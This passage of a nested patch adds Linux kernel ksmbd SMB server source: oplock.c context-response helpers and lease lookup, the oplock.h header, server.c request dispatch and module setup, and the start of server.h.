++	buf->Name[0] = 'D';
++	buf->Name[1] = 'H';
++	buf->Name[2] = 'n';
++	buf->Name[3] = 'Q';
++}
++
++/**
++ * create_durable_v2_rsp_buf() - create durable handle v2 context
++ * @cc:	buffer to create durable context response
++ * @fp: ksmbd file pointer
++ */
++void create_durable_v2_rsp_buf(char *cc, struct ksmbd_file *fp)
++{
++	struct create_durable_v2_rsp *buf;
++
++	buf = (struct create_durable_v2_rsp *)cc;
++	memset(buf, 0, sizeof(struct create_durable_rsp));
++	buf->ccontext.DataOffset = cpu_to_le16(offsetof
++			(struct create_durable_rsp, Data));
++	buf->ccontext.DataLength = cpu_to_le32(8);
++	buf->ccontext.NameOffset = cpu_to_le16(offsetof
++			(struct create_durable_rsp, Name));
++	buf->ccontext.NameLength = cpu_to_le16(4);
++	/* SMB2_CREATE_DURABLE_HANDLE_RESPONSE_V2 is "DH2Q" */
++	buf->Name[0] = 'D';
++	buf->Name[1] = 'H';
++	buf->Name[2] = '2';
++	buf->Name[3] = 'Q';
++
++	buf->Timeout = cpu_to_le32(fp->durable_timeout);
++}
++
++/**
++ * create_mxac_rsp_buf() - create query maximal access context
++ * @cc:			buffer to create maximal access context response
++ * @maximal_access:	maximal access
++ */
++void create_mxac_rsp_buf(char *cc, int maximal_access)
++{
++	struct create_mxac_rsp *buf;
++
++	buf = (struct create_mxac_rsp *)cc;
++	memset(buf, 0, sizeof(struct create_mxac_rsp));
++	buf->ccontext.DataOffset = cpu_to_le16(offsetof
++			(struct create_mxac_rsp, QueryStatus));
++	buf->ccontext.DataLength = cpu_to_le32(8);
++	buf->ccontext.NameOffset = cpu_to_le16(offsetof
++			(struct create_mxac_rsp, Name));
++	buf->ccontext.NameLength = cpu_to_le16(4);
++	/* SMB2_CREATE_QUERY_MAXIMAL_ACCESS_RESPONSE is "MxAc" */
++	buf->Name[0] = 'M';
++	buf->Name[1] = 'x';
++	buf->Name[2] = 'A';
++	buf->Name[3] = 'c';
++
++	buf->QueryStatus = STATUS_SUCCESS;
++	buf->MaximalAccess = cpu_to_le32(maximal_access);
++}
++
++void create_disk_id_rsp_buf(char *cc, __u64 file_id, __u64 vol_id)
++{
++	struct create_disk_id_rsp *buf;
++
++	buf = (struct create_disk_id_rsp *)cc;
++	memset(buf, 0, sizeof(struct create_disk_id_rsp));
++	buf->ccontext.DataOffset = cpu_to_le16(offsetof
++			(struct create_disk_id_rsp, DiskFileId));
++	buf->ccontext.DataLength = cpu_to_le32(32);
++	buf->ccontext.NameOffset = cpu_to_le16(offsetof
++			(struct create_mxac_rsp, Name));
++	buf->ccontext.NameLength = cpu_to_le16(4);
++	/* SMB2_CREATE_QUERY_ON_DISK_ID_RESPONSE is "QFid" */
++	buf->Name[0] = 'Q';
++	buf->Name[1] = 'F';
++	buf->Name[2] = 'i';
++	buf->Name[3] = 'd';
++
++	buf->DiskFileId = cpu_to_le64(file_id);
++	buf->VolumeId = cpu_to_le64(vol_id);
++}
++
++/**
++ * create_posix_rsp_buf() - create posix extension context
++ * @cc:	buffer to create posix on posix response
++ * @fp: ksmbd file pointer
++ */
++void create_posix_rsp_buf(char *cc, struct ksmbd_file *fp)
++{
++	struct create_posix_rsp *buf;
++	struct inode *inode = file_inode(fp->filp);
++	struct user_namespace *user_ns = file_mnt_user_ns(fp->filp);
++	vfsuid_t vfsuid = i_uid_into_vfsuid(user_ns, inode);
++	vfsgid_t vfsgid = i_gid_into_vfsgid(user_ns, inode);
++
++	buf = (struct create_posix_rsp *)cc;
++	memset(buf, 0, sizeof(struct create_posix_rsp));
++	buf->ccontext.DataOffset = cpu_to_le16(offsetof
++			(struct create_posix_rsp, nlink));
++	/*
++	 * DataLength = nlink(4) + reparse_tag(4) + mode(4) +
++	 * domain sid(28) + unix group sid(16).
++	 */
++	buf->ccontext.DataLength = cpu_to_le32(56);
++	buf->ccontext.NameOffset = cpu_to_le16(offsetof
++			(struct create_posix_rsp, Name));
++	buf->ccontext.NameLength = cpu_to_le16(POSIX_CTXT_DATA_LEN);
++	/* SMB2_CREATE_TAG_POSIX is "0x93AD25509CB411E7B42383DE968BCD7C" */
++	buf->Name[0] = 0x93;
++	buf->Name[1] = 0xAD;
++	buf->Name[2] = 0x25;
++	buf->Name[3] = 0x50;
++	buf->Name[4] = 0x9C;
++	buf->Name[5] = 0xB4;
++	buf->Name[6] = 0x11;
++	buf->Name[7] = 0xE7;
++	buf->Name[8] = 0xB4;
++	buf->Name[9] = 0x23;
++	buf->Name[10] = 0x83;
++	buf->Name[11] = 0xDE;
++	buf->Name[12] = 0x96;
++	buf->Name[13] = 0x8B;
++	buf->Name[14] = 0xCD;
++	buf->Name[15] = 0x7C;
++
++	buf->nlink = cpu_to_le32(inode->i_nlink);
++	buf->reparse_tag = cpu_to_le32(fp->volatile_id);
++	buf->mode = cpu_to_le32(inode->i_mode & 0777);
++	/*
++	 * SidBuffer(44) contain two sids(Domain sid(28), UNIX group sid(16)).
++	 * Domain sid(28) = revision(1) + num_subauth(1) + authority(6) +
++	 *		    sub_auth(4 * 4(num_subauth)) + RID(4).
++	 * UNIX group id(16) = revision(1) + num_subauth(1) + authority(6) +
++	 *		       sub_auth(4 * 1(num_subauth)) + RID(4).
++	 */
++	id_to_sid(from_kuid_munged(&init_user_ns, vfsuid_into_kuid(vfsuid)),
++		  SIDOWNER, (struct smb_sid *)&buf->SidBuffer[0]);
++	id_to_sid(from_kgid_munged(&init_user_ns, vfsgid_into_kgid(vfsgid)),
++		  SIDUNIX_GROUP, (struct smb_sid *)&buf->SidBuffer[28]);
++}
++
++/*
++ * Find lease object(opinfo) for given lease key/fid from lease
++ * break/file close path.
++ */
++/**
++ * lookup_lease_in_table() - find a matching lease info object
++ * @conn:	connection instance
++ * @lease_key:	lease key to be searched for
++ *
++ * Return:      opinfo if found matching opinfo, otherwise NULL
++ */
++struct oplock_info *lookup_lease_in_table(struct ksmbd_conn *conn,
++					  char *lease_key)
++{
++	struct oplock_info *opinfo = NULL, *ret_op = NULL;
++	struct lease_table *lt;
++	int ret;
++
++	read_lock(&lease_list_lock);
++	list_for_each_entry(lt, &lease_table_list, l_entry) {
++		if (!memcmp(lt->client_guid, conn->ClientGUID,
++			    SMB2_CLIENT_GUID_SIZE))
++			goto found;
++	}
++
++	read_unlock(&lease_list_lock);
++	return NULL;
++
++found:
++	rcu_read_lock();
++	list_for_each_entry_rcu(opinfo, &lt->lease_list, lease_entry) {
++		if (!atomic_inc_not_zero(&opinfo->refcount))
++			continue;
++		rcu_read_unlock();
++		if (!opinfo->op_state || opinfo->op_state == OPLOCK_CLOSING)
++			goto op_next;
++		if (!(opinfo->o_lease->state &
++		      (SMB2_LEASE_HANDLE_CACHING_LE |
++		       SMB2_LEASE_WRITE_CACHING_LE)))
++			goto op_next;
++		ret = compare_guid_key(opinfo, conn->ClientGUID,
++				       lease_key);
++		if (ret) {
++			ksmbd_debug(OPLOCK, "found opinfo\n");
++			ret_op = opinfo;
++			goto out;
++		}
++op_next:
++		opinfo_put(opinfo);
++		rcu_read_lock();
++	}
++	rcu_read_unlock();
++
++out:
++	read_unlock(&lease_list_lock);
++	return ret_op;
++}
+diff --git a/fs/smb/server/oplock.h b/fs/smb/server/oplock.h
+new file mode 100644
+index 0000000000000..4b0fe6da76940
+--- /dev/null
++++ b/fs/smb/server/oplock.h
+@@ -0,0 +1,127 @@
++/* SPDX-License-Identifier: GPL-2.0-or-later */
++/*
++ *   Copyright (C) 2016 Namjae Jeon <linkinjeon@kernel.org>
++ *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
++ */
++
++#ifndef __KSMBD_OPLOCK_H
++#define __KSMBD_OPLOCK_H
++
++#include "smb_common.h"
++
++#define OPLOCK_WAIT_TIME	(35 * HZ)
++
++/* SMB2 Oplock levels */
++#define SMB2_OPLOCK_LEVEL_NONE          0x00
++#define SMB2_OPLOCK_LEVEL_II            0x01
++#define SMB2_OPLOCK_LEVEL_EXCLUSIVE     0x08
++#define SMB2_OPLOCK_LEVEL_BATCH         0x09
++#define SMB2_OPLOCK_LEVEL_LEASE         0xFF
++
++/* Oplock states */
++#define OPLOCK_STATE_NONE	0x00
++#define OPLOCK_ACK_WAIT		0x01
++#define OPLOCK_CLOSING		0x02
++
++#define OPLOCK_WRITE_TO_READ		0x01
++#define OPLOCK_READ_HANDLE_TO_READ	0x02
++#define OPLOCK_WRITE_TO_NONE		0x04
++#define OPLOCK_READ_TO_NONE		0x08
++
++struct lease_ctx_info {
++	__u8			lease_key[SMB2_LEASE_KEY_SIZE];
++	__le32			req_state;
++	__le32			flags;
++	__le64			duration;
++	__u8			parent_lease_key[SMB2_LEASE_KEY_SIZE];
++	int			version;
++};
++
++struct lease_table {
++	char			client_guid[SMB2_CLIENT_GUID_SIZE];
++	struct list_head	lease_list;
++	struct list_head	l_entry;
++	spinlock_t		lb_lock;
++};
++
++struct lease {
++	__u8			lease_key[SMB2_LEASE_KEY_SIZE];
++	__le32			state;
++	__le32			new_state;
++	__le32			flags;
++	__le64			duration;
++	__u8			parent_lease_key[SMB2_LEASE_KEY_SIZE];
++	int			version;
++	unsigned short		epoch;
++	struct lease_table	*l_lb;
++};
++
++struct oplock_info {
++	struct ksmbd_conn	*conn;
++	struct ksmbd_session	*sess;
++	struct ksmbd_work	*work;
++	struct ksmbd_file	*o_fp;
++	int                     level;
++	int                     op_state;
++	unsigned long		pending_break;
++	u64			fid;
++	atomic_t		breaking_cnt;
++	atomic_t		refcount;
++	__u16                   Tid;
++	bool			is_lease;
++	bool			open_trunc;	/* truncate on open */
++	struct lease		*o_lease;
++	struct list_head        interim_list;
++	struct list_head        op_entry;
++	struct list_head        lease_entry;
++	wait_queue_head_t oplock_q; /* Other server threads */
++	wait_queue_head_t oplock_brk; /* oplock breaking wait */
++	struct rcu_head		rcu_head;
++};
++
++struct lease_break_info {
++	__le32			curr_state;
++	__le32			new_state;
++	__le16			epoch;
++	char			lease_key[SMB2_LEASE_KEY_SIZE];
++};
++
++struct oplock_break_info {
++	int level;
++	int open_trunc;
++	int fid;
++};
++
++int smb_grant_oplock(struct ksmbd_work *work, int req_op_level,
++		     u64 pid, struct ksmbd_file *fp, __u16 tid,
++		     struct lease_ctx_info *lctx, int share_ret);
++void smb_break_all_levII_oplock(struct ksmbd_work *work,
++				struct ksmbd_file *fp, int is_trunc);
++int opinfo_write_to_read(struct oplock_info *opinfo);
++int opinfo_read_handle_to_read(struct oplock_info *opinfo);
++int opinfo_write_to_none(struct oplock_info *opinfo);
++int opinfo_read_to_none(struct oplock_info *opinfo);
++void close_id_del_oplock(struct ksmbd_file *fp);
++void smb_break_all_oplock(struct ksmbd_work *work, struct ksmbd_file *fp);
++struct oplock_info *opinfo_get(struct ksmbd_file *fp);
++void opinfo_put(struct oplock_info *opinfo);
++
++/* Lease related functions */
++void create_lease_buf(u8 *rbuf, struct lease *lease);
++struct lease_ctx_info *parse_lease_state(void *open_req);
++__u8 smb2_map_lease_to_oplock(__le32 lease_state);
++int lease_read_to_write(struct oplock_info *opinfo);
++
++/* Durable related functions */
++void create_durable_rsp_buf(char *cc);
++void create_durable_v2_rsp_buf(char *cc, struct ksmbd_file *fp);
++void create_mxac_rsp_buf(char *cc, int maximal_access);
++void create_disk_id_rsp_buf(char *cc, __u64 file_id, __u64 vol_id);
++void create_posix_rsp_buf(char *cc, struct ksmbd_file *fp);
++struct create_context *smb2_find_context_vals(void *open_req, const char *tag, int tag_len);
++struct oplock_info *lookup_lease_in_table(struct ksmbd_conn *conn,
++					  char *lease_key);
++int find_same_lease_key(struct ksmbd_session *sess, struct ksmbd_inode *ci,
++			struct lease_ctx_info *lctx);
++void destroy_lease_table(struct ksmbd_conn *conn);
++#endif /* __KSMBD_OPLOCK_H */
+diff --git a/fs/smb/server/server.c b/fs/smb/server/server.c
+new file mode 100644
+index 0000000000000..847ee62afb8a1
+--- /dev/null
++++ b/fs/smb/server/server.c
+@@ -0,0 +1,646 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ *   Copyright (C) 2016 Namjae Jeon <linkinjeon@kernel.org>
++ *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
++ */
++
++#include "glob.h"
++#include "oplock.h"
++#include "misc.h"
++#include <linux/sched/signal.h>
++#include <linux/workqueue.h>
++#include <linux/sysfs.h>
++#include <linux/module.h>
++#include <linux/moduleparam.h>
++
++#include "server.h"
++#include "smb_common.h"
++#include "smbstatus.h"
++#include "connection.h"
++#include "transport_ipc.h"
++#include "mgmt/user_session.h"
++#include "crypto_ctx.h"
++#include "auth.h"
++
++int ksmbd_debug_types;
++
++struct ksmbd_server_config server_conf;
++
++enum SERVER_CTRL_TYPE {
++	SERVER_CTRL_TYPE_INIT,
++	SERVER_CTRL_TYPE_RESET,
++};
++
++struct server_ctrl_struct {
++	int			type;
++	struct work_struct	ctrl_work;
++};
++
++static DEFINE_MUTEX(ctrl_lock);
++
++static int ___server_conf_set(int idx, char *val)
++{
++	if (idx >= ARRAY_SIZE(server_conf.conf))
++		return -EINVAL;
++
++	if (!val || val[0] == 0x00)
++		return -EINVAL;
++
++	kfree(server_conf.conf[idx]);
++	server_conf.conf[idx] = kstrdup(val, GFP_KERNEL);
++	if (!server_conf.conf[idx])
++		return -ENOMEM;
++	return 0;
++}
++
++int ksmbd_set_netbios_name(char *v)
++{
++	return ___server_conf_set(SERVER_CONF_NETBIOS_NAME, v);
++}
++
++int ksmbd_set_server_string(char *v)
++{
++	return ___server_conf_set(SERVER_CONF_SERVER_STRING, v);
++}
++
++int ksmbd_set_work_group(char *v)
++{
++	return ___server_conf_set(SERVER_CONF_WORK_GROUP, v);
++}
++
++char *ksmbd_netbios_name(void)
++{
++	return server_conf.conf[SERVER_CONF_NETBIOS_NAME];
++}
++
++char *ksmbd_server_string(void)
++{
++	return server_conf.conf[SERVER_CONF_SERVER_STRING];
++}
++
++char *ksmbd_work_group(void)
++{
++	return server_conf.conf[SERVER_CONF_WORK_GROUP];
++}
++
++/**
++ * check_conn_state() - check state of server thread connection
++ * @work:     smb work containing server thread information
++ *
++ * Return:	0 on valid connection, otherwise 1 to reconnect
++ */
++static inline int check_conn_state(struct ksmbd_work *work)
++{
++	struct smb_hdr *rsp_hdr;
++
++	if (ksmbd_conn_exiting(work->conn) ||
++	    ksmbd_conn_need_reconnect(work->conn)) {
++		rsp_hdr = work->response_buf;
++		rsp_hdr->Status.CifsError = STATUS_CONNECTION_DISCONNECTED;
++		return 1;
++	}
++	return 0;
++}
++
++#define SERVER_HANDLER_CONTINUE		0
++#define SERVER_HANDLER_ABORT		1
++
++static int __process_request(struct ksmbd_work *work, struct ksmbd_conn *conn,
++			     u16 *cmd)
++{
++	struct smb_version_cmds *cmds;
++	u16 command;
++	int ret;
++
++	if (check_conn_state(work))
++		return SERVER_HANDLER_CONTINUE;
++
++	if (ksmbd_verify_smb_message(work))
++		return SERVER_HANDLER_ABORT;
++
++	command = conn->ops->get_cmd_val(work);
++	*cmd = command;
++
++andx_again:
++	if (command >= conn->max_cmds) {
++		conn->ops->set_rsp_status(work, STATUS_INVALID_PARAMETER);
++		return SERVER_HANDLER_CONTINUE;
++	}
++
++	cmds = &conn->cmds[command];
++	if (!cmds->proc) {
++		ksmbd_debug(SMB, "*** not implemented yet cmd = %x\n", command);
++		conn->ops->set_rsp_status(work, STATUS_NOT_IMPLEMENTED);
++		return SERVER_HANDLER_CONTINUE;
++	}
++
++	if (work->sess && conn->ops->is_sign_req(work, command)) {
++		ret = conn->ops->check_sign_req(work);
++		if (!ret) {
++			conn->ops->set_rsp_status(work, STATUS_ACCESS_DENIED);
++			return SERVER_HANDLER_CONTINUE;
++		}
++	}
++
++	ret = cmds->proc(work);
++
++	if (ret < 0)
++		ksmbd_debug(CONN, "Failed to process %u [%d]\n", command, ret);
++	/* AndX commands - chained request can return positive values */
++	else if (ret > 0) {
++		command = ret;
++		*cmd = command;
++		goto andx_again;
++	}
++
++	if (work->send_no_response)
++		return SERVER_HANDLER_ABORT;
++	return SERVER_HANDLER_CONTINUE;
++}
++
++static void __handle_ksmbd_work(struct ksmbd_work *work,
++				struct ksmbd_conn *conn)
++{
++	u16 command = 0;
++	int rc;
++
++	if (conn->ops->allocate_rsp_buf(work))
++		return;
++
++	if (conn->ops->is_transform_hdr &&
++	    conn->ops->is_transform_hdr(work->request_buf)) {
++		rc = conn->ops->decrypt_req(work);
++		if (rc < 0) {
++			conn->ops->set_rsp_status(work, STATUS_DATA_ERROR);
++			goto send;
++		}
++
++		work->encrypted = true;
++	}
++
++	rc = conn->ops->init_rsp_hdr(work);
++	if (rc) {
++		/* either uid or tid is not correct */
++		conn->ops->set_rsp_status(work, STATUS_INVALID_HANDLE);
++		goto send;
++	}
++
++	do {
++		if (conn->ops->check_user_session) {
++			rc = conn->ops->check_user_session(work);
++			if (rc < 0) {
++				if (rc == -EINVAL)
++					conn->ops->set_rsp_status(work,
++						STATUS_INVALID_PARAMETER);
++				else
++					conn->ops->set_rsp_status(work,
++						STATUS_USER_SESSION_DELETED);
++				goto send;
++			} else if (rc > 0) {
++				rc = conn->ops->get_ksmbd_tcon(work);
++				if (rc < 0) {
++					if (rc == -EINVAL)
++						conn->ops->set_rsp_status(work,
++							STATUS_INVALID_PARAMETER);
++					else
++						conn->ops->set_rsp_status(work,
++							STATUS_NETWORK_NAME_DELETED);
++					goto send;
++				}
++			}
++		}
++
++		rc = __process_request(work, conn, &command);
++		if (rc == SERVER_HANDLER_ABORT)
++			break;
++
++		/*
++		 * Call smb2_set_rsp_credits() function to set number of credits
++		 * granted in hdr of smb2 response.
++		 */
++		if (conn->ops->set_rsp_credits) {
++			spin_lock(&conn->credits_lock);
++			rc = conn->ops->set_rsp_credits(work);
++			spin_unlock(&conn->credits_lock);
++			if (rc < 0) {
++				conn->ops->set_rsp_status(work,
++					STATUS_INVALID_PARAMETER);
++				goto send;
++			}
++		}
++
++		if (work->sess &&
++		    (work->sess->sign || smb3_11_final_sess_setup_resp(work) ||
++		     conn->ops->is_sign_req(work, command)))
++			conn->ops->set_sign_rsp(work);
++	} while (is_chained_smb2_message(work));
++
++	if (work->send_no_response)
++		return;
++
++send:
++	smb3_preauth_hash_rsp(work);
++	if (work->sess && work->sess->enc && work->encrypted &&
++	    conn->ops->encrypt_resp) {
++		rc = conn->ops->encrypt_resp(work);
++		if (rc < 0)
++			conn->ops->set_rsp_status(work, STATUS_DATA_ERROR);
++	}
++
++	ksmbd_conn_write(work);
++}
++
++/**
++ * handle_ksmbd_work() - process pending smb work requests
++ * @wk:	smb work containing request command buffer
++ *
++ * called by kworker threads to processing remaining smb work requests
++ */
++static void handle_ksmbd_work(struct work_struct *wk)
++{
++	struct ksmbd_work *work = container_of(wk, struct ksmbd_work, work);
++	struct ksmbd_conn *conn = work->conn;
++
++	atomic64_inc(&conn->stats.request_served);
++
++	__handle_ksmbd_work(work, conn);
++
++	ksmbd_conn_try_dequeue_request(work);
++	ksmbd_free_work_struct(work);
++	/*
++	 * Checking waitqueue to dropping pending requests on
++	 * disconnection. waitqueue_active is safe because it
++	 * uses atomic operation for condition.
++	 */
++	if (!atomic_dec_return(&conn->r_count) && waitqueue_active(&conn->r_count_q))
++		wake_up(&conn->r_count_q);
++}
++
++/**
++ * queue_ksmbd_work() - queue a smb request to worker thread queue
++ *		for proccessing smb command and sending response
++ * @conn:	connection instance
++ *
++ * read remaining data from socket create and submit work.
++ */
++static int queue_ksmbd_work(struct ksmbd_conn *conn)
++{
++	struct ksmbd_work *work;
++
++	work = ksmbd_alloc_work_struct();
++	if (!work) {
++		pr_err("allocation for work failed\n");
++		return -ENOMEM;
++	}
++
++	work->conn = conn;
++	work->request_buf = conn->request_buf;
++	conn->request_buf = NULL;
++
++	ksmbd_init_smb_server(work);
++
++	ksmbd_conn_enqueue_request(work);
++	atomic_inc(&conn->r_count);
++	/* update activity on connection */
++	conn->last_active = jiffies;
++	INIT_WORK(&work->work, handle_ksmbd_work);
++	ksmbd_queue_work(work);
++	return 0;
++}
++
++static int ksmbd_server_process_request(struct ksmbd_conn *conn)
++{
++	return queue_ksmbd_work(conn);
++}
++
++static int ksmbd_server_terminate_conn(struct ksmbd_conn *conn)
++{
++	ksmbd_sessions_deregister(conn);
++	destroy_lease_table(conn);
++	return 0;
++}
++
++static void ksmbd_server_tcp_callbacks_init(void)
++{
++	struct ksmbd_conn_ops ops;
++
++	ops.process_fn = ksmbd_server_process_request;
++	ops.terminate_fn = ksmbd_server_terminate_conn;
++
++	ksmbd_conn_init_server_callbacks(&ops);
++}
++
++static void server_conf_free(void)
++{
++	int i;
++
++	for (i = 0; i < ARRAY_SIZE(server_conf.conf); i++) {
++		kfree(server_conf.conf[i]);
++		server_conf.conf[i] = NULL;
++	}
++}
++
++static int server_conf_init(void)
++{
++	WRITE_ONCE(server_conf.state, SERVER_STATE_STARTING_UP);
++	server_conf.enforced_signing = 0;
++	server_conf.min_protocol = ksmbd_min_protocol();
++	server_conf.max_protocol = ksmbd_max_protocol();
++	server_conf.auth_mechs = KSMBD_AUTH_NTLMSSP;
++#ifdef CONFIG_SMB_SERVER_KERBEROS5
++	server_conf.auth_mechs |= KSMBD_AUTH_KRB5 |
++				KSMBD_AUTH_MSKRB5;
++#endif
++	return 0;
++}
++
++static void server_ctrl_handle_init(struct server_ctrl_struct *ctrl)
++{
++	int ret;
++
++	ret = ksmbd_conn_transport_init();
++	if (ret) {
++		server_queue_ctrl_reset_work();
++		return;
++	}
++
++	WRITE_ONCE(server_conf.state, SERVER_STATE_RUNNING);
++}
++
++static void server_ctrl_handle_reset(struct server_ctrl_struct *ctrl)
++{
++	ksmbd_ipc_soft_reset();
++	ksmbd_conn_transport_destroy();
++	server_conf_free();
++	server_conf_init();
++	WRITE_ONCE(server_conf.state, SERVER_STATE_STARTING_UP);
++}
++
++static void server_ctrl_handle_work(struct work_struct *work)
++{
++	struct server_ctrl_struct *ctrl;
++
++	ctrl = container_of(work, struct server_ctrl_struct, ctrl_work);
++
++	mutex_lock(&ctrl_lock);
++	switch (ctrl->type) {
++	case SERVER_CTRL_TYPE_INIT:
++		server_ctrl_handle_init(ctrl);
++		break;
++	case SERVER_CTRL_TYPE_RESET:
++		server_ctrl_handle_reset(ctrl);
++		break;
++	default:
++		pr_err("Unknown server work type: %d\n", ctrl->type);
++	}
++	mutex_unlock(&ctrl_lock);
++	kfree(ctrl);
++	module_put(THIS_MODULE);
++}
++
++static int __queue_ctrl_work(int type)
++{
++	struct server_ctrl_struct *ctrl;
++
++	ctrl = kmalloc(sizeof(struct server_ctrl_struct), GFP_KERNEL);
++	if (!ctrl)
++		return -ENOMEM;
++
++	__module_get(THIS_MODULE);
++	ctrl->type = type;
++	INIT_WORK(&ctrl->ctrl_work, server_ctrl_handle_work);
++	queue_work(system_long_wq, &ctrl->ctrl_work);
++	return 0;
++}
++
++int server_queue_ctrl_init_work(void)
++{
++	return __queue_ctrl_work(SERVER_CTRL_TYPE_INIT);
++}
++
++int server_queue_ctrl_reset_work(void)
++{
++	return __queue_ctrl_work(SERVER_CTRL_TYPE_RESET);
++}
++
++static ssize_t stats_show(struct class *class, struct class_attribute *attr,
++			  char *buf)
++{
++	/*
++	 * Inc this each time you change stats output format,
++	 * so user space will know what to do.
++	 */
++	static int stats_version = 2;
++	static const char * const state[] = {
++		"startup",
++		"running",
++		"reset",
++		"shutdown"
++	};
++
++	ssize_t sz = scnprintf(buf, PAGE_SIZE, "%d %s %d %lu\n", stats_version,
++			       state[server_conf.state], server_conf.tcp_port,
++			       server_conf.ipc_last_active / HZ);
++	return sz;
++}
++
++static ssize_t kill_server_store(struct class *class,
++				 struct class_attribute *attr, const char *buf,
++				 size_t len)
++{
++	if (!sysfs_streq(buf, "hard"))
++		return len;
++
++	pr_info("kill command received\n");
++	mutex_lock(&ctrl_lock);
++	WRITE_ONCE(server_conf.state, SERVER_STATE_RESETTING);
++	__module_get(THIS_MODULE);
++	server_ctrl_handle_reset(NULL);
++	module_put(THIS_MODULE);
++	mutex_unlock(&ctrl_lock);
++	return len;
++}
++
++static const char * const debug_type_strings[] = {"smb", "auth", "vfs",
++						  "oplock", "ipc", "conn",
++						  "rdma"};
++
++static ssize_t debug_show(struct class *class, struct class_attribute *attr,
++			  char *buf)
++{
++	ssize_t sz = 0;
++	int i, pos = 0;
++
++	for (i = 0; i < ARRAY_SIZE(debug_type_strings); i++) {
++		if ((ksmbd_debug_types >> i) & 1) {
++			pos = scnprintf(buf + sz,
++					PAGE_SIZE - sz,
++					"[%s] ",
++					debug_type_strings[i]);
++		} else {
++			pos = scnprintf(buf + sz,
++					PAGE_SIZE - sz,
++					"%s ",
++					debug_type_strings[i]);
++		}
++		sz += pos;
++	}
++	sz += scnprintf(buf + sz, PAGE_SIZE - sz, "\n");
++	return sz;
++}
++
++static ssize_t debug_store(struct class *class, struct class_attribute *attr,
++			   const char *buf, size_t len)
++{
++	int i;
++
++	for (i = 0; i < ARRAY_SIZE(debug_type_strings); i++) {
++		if (sysfs_streq(buf, "all")) {
++			if (ksmbd_debug_types == KSMBD_DEBUG_ALL)
++				ksmbd_debug_types = 0;
++			else
++				ksmbd_debug_types = KSMBD_DEBUG_ALL;
++			break;
++		}
++
++		if (sysfs_streq(buf, debug_type_strings[i])) {
++			if (ksmbd_debug_types & (1 << i))
++				ksmbd_debug_types &= ~(1 << i);
++			else
++				ksmbd_debug_types |= (1 << i);
++			break;
++		}
++	}
++
++	return len;
++}
++
++static CLASS_ATTR_RO(stats);
++static CLASS_ATTR_WO(kill_server);
++static CLASS_ATTR_RW(debug);
++
++static struct attribute *ksmbd_control_class_attrs[] = {
++	&class_attr_stats.attr,
++	&class_attr_kill_server.attr,
++	&class_attr_debug.attr,
++	NULL,
++};
++ATTRIBUTE_GROUPS(ksmbd_control_class);
++
++static struct class ksmbd_control_class = {
++	.name		= "ksmbd-control",
++	.owner		= THIS_MODULE,
++	.class_groups	= ksmbd_control_class_groups,
++};
++
++static int ksmbd_server_shutdown(void)
++{
++	WRITE_ONCE(server_conf.state, SERVER_STATE_SHUTTING_DOWN);
++
++	class_unregister(&ksmbd_control_class);
++	ksmbd_workqueue_destroy();
++	ksmbd_ipc_release();
++	ksmbd_conn_transport_destroy();
++	ksmbd_crypto_destroy();
++	ksmbd_free_global_file_table();
++	destroy_lease_table(NULL);
++	ksmbd_work_pool_destroy();
++	ksmbd_exit_file_cache();
++	server_conf_free();
++	return 0;
++}
++
++static int __init ksmbd_server_init(void)
++{
++	int ret;
++
++	ret = class_register(&ksmbd_control_class);
++	if (ret) {
++		pr_err("Unable to register ksmbd-control class\n");
++		return ret;
++	}
++
++	ksmbd_server_tcp_callbacks_init();
++
++	ret = server_conf_init();
++	if (ret)
++		goto err_unregister;
++
++	ret = ksmbd_work_pool_init();
++	if (ret)
++		goto err_unregister;
++
++	ret = ksmbd_init_file_cache();
++	if (ret)
++		goto err_destroy_work_pools;
++
++	ret = ksmbd_ipc_init();
++	if (ret)
++		goto err_exit_file_cache;
++
++	ret = ksmbd_init_global_file_table();
++	if (ret)
++		goto err_ipc_release;
++
++	ret = ksmbd_inode_hash_init();
++	if (ret)
++		goto err_destroy_file_table;
++
++	ret = ksmbd_crypto_create();
++	if (ret)
++		goto err_release_inode_hash;
++
++	ret = ksmbd_workqueue_init();
++	if (ret)
++		goto err_crypto_destroy;
++
++	pr_warn_once("The ksmbd server is experimental\n");
++
++	return 0;
++
++err_crypto_destroy:
++	ksmbd_crypto_destroy();
++err_release_inode_hash:
++	ksmbd_release_inode_hash();
++err_destroy_file_table:
++	ksmbd_free_global_file_table();
++err_ipc_release:
++	ksmbd_ipc_release();
++err_exit_file_cache:
++	ksmbd_exit_file_cache();
++err_destroy_work_pools:
++	ksmbd_work_pool_destroy();
++err_unregister:
++	class_unregister(&ksmbd_control_class);
++
++	return ret;
++}
++
++/**
++ * ksmbd_server_exit() - shutdown forker thread and free memory at module exit
++ */
++static void __exit ksmbd_server_exit(void)
++{
++	ksmbd_server_shutdown();
++	rcu_barrier();
++	ksmbd_release_inode_hash();
++}
++
++MODULE_AUTHOR("Namjae Jeon <linkinjeon@kernel.org>");
++MODULE_VERSION(KSMBD_VERSION);
++MODULE_DESCRIPTION("Linux kernel CIFS/SMB SERVER");
++MODULE_LICENSE("GPL");
++MODULE_SOFTDEP("pre: ecb");
++MODULE_SOFTDEP("pre: hmac");
++MODULE_SOFTDEP("pre: md5");
++MODULE_SOFTDEP("pre: nls");
++MODULE_SOFTDEP("pre: aes");
++MODULE_SOFTDEP("pre: cmac");
++MODULE_SOFTDEP("pre: sha256");
++MODULE_SOFTDEP("pre: sha512");
++MODULE_SOFTDEP("pre: aead2");
++MODULE_SOFTDEP("pre: ccm");
++MODULE_SOFTDEP("pre: gcm");
++MODULE_SOFTDEP("pre: crc32");
++module_init(ksmbd_server_init)
++module_exit(ksmbd_server_exit)
+diff --git a/fs/smb/server/server.h b/fs/smb/server/server.h
+new file mode 100644
+index 0000000000000..db72781817603
+--- /dev/null
++++ b/fs/smb/server/server.h
+@@ -0,0 +1,71 @@
++/* SPDX-License-Identifier: GPL-2.0-or-later */
++/*
++ *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
++ */
++
++#ifndef __SERVER_H__
++#define __SERVER_H__
++
++#include "smbacl.h"
++
++/*
++ * Server state type
++ */
++enum {
++	SERVER_STATE_STARTING_UP,
++	SERVER_STATE_RUNNING,
++	SERVER_STATE_RESETTING,
++	SERVER_STATE_SHUTTING_DOWN,
++};
++
++/*
++ * Server global config string index
++ */
++enum {
++	SERVER_CONF_NETBIOS_NAME,
++	SERVER_CONF_SERVER_STRING,
++	SERVER_CONF_WORK_GROUP,
++};
++
++struct ksmbd_server_config {
++	unsigned int		flags;
